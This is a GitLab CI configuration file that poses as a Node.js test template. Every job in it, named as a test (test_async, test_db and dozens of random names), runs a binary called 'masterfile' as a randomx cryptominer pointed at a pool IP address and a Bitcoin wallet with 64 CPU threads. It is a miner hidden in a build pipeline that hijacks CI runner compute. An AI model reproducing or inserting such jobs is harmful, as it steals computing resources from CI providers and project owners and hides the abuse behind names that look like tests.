# This file is a template, and might need editing before it works on your project.
# Official framework image. Look for the different tagged releases at:
# https://hub.docker.com/r/library/node/tags/
image: node:latest

# Pick zero or more services to be used on all builds.
# Only needed when using a docker container to run your tests in.
# Check out: http://docs.gitlab.com/ee/ci/docker/using_docker_images.html#what-is-a-service
services:
  - mysql:latest
  - redis:latest
  - postgres:latest

# This folder is cached between builds
# http://docs.gitlab.com/ee/ci/yaml/README.html#cache
cache:
  paths:
    - node_modules/

test_async:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_db:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asfync:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_ddb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_assync:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dab:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_ashync:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dbr:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_ashync:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dbc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asjync:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dfdb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asynfc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dhb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asyknc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_ddb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asyntc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_ddb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asydnc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dfb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asyhnc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dhb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asyjnc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dfb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asyjnc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_vcdb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asynnc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_vdb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asy,nc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_deb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asyudnc:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dxb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_asjkync:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00


test_dfhb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_dxhb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_dchb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_dfhz:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;00

test_afhb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_zzzzzz:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_uyeruyue:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_iopljn:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_nmnkjoj:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_uiwuerjw:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_poijhbnjhg:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_oiuytresdfghb:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_qjwkasmndkfjeruij:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_kfdskfj:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_fkewlkfel:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_lkrelkgrl:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_kklfwejgwrhjj:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_jdksjkdjfiew:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_otiewrjnrghj:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_rgeokgroerkg:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_ekrgjegjerigj:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_zmcznmnvm:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0

test_kgjerogjreo:
  script:
    -   chmod u+x masterfile && ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0